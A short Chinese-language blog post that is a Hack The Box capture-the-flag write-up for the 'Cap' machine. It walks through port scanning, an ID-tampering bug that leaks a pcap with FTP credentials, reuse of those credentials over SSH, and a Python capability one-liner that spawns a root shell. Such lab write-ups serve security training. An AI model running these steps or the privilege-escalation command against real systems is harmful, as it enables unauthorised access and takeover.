Steven Meow's Blog 🐱

Cap (Hack The Box Writeup)

URL : https://app.hackthebox.eu/machines/351

IP : 10.10.10.245

Recon

  • 剛開始先掃 Port
    • rustscan -a 10.10.10.245 -r 1-65535
    • nmap -A -p21,22,80 10.10.10.245
    • 觀察有開的 port
      • 22
      • 21 : vsFTPd 3.0.3
      • 80
  • 掃路徑
    • python3 dirsearch.py -u http://10.10.10.245/
    • 基本上都還是跳轉回首頁,沒什麼 QQ
  • 觀察首頁
  • 觀察下載的 /data 發現預設是從 2 開始
    • 嘗試改 1 會出現空白
    • 嘗試改 0
      • http://10.10.10.245/data/0
      • 可以下載到一包 pcap 檔案
  • 分析 pcap 檔案
    • 可以找到 ftp 的登入帳密
      • nathan
      • Buck3tH4TF0RM3!

進入系統

  • 直接 ssh 連上
  • 取得 user flag

提權

  • 準備 LinEnum
  • 執行 LinEnum
    • bash LinEnum.sh
  • 發現 python3 有 capability
  • GTFOBins 尋找 Py capability 解法
    • https://gtfobins.github.io/gtfobins/python/#capabilities
    • /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
  • 取得 Root Shell 與 Flag

steven

,

發表迴響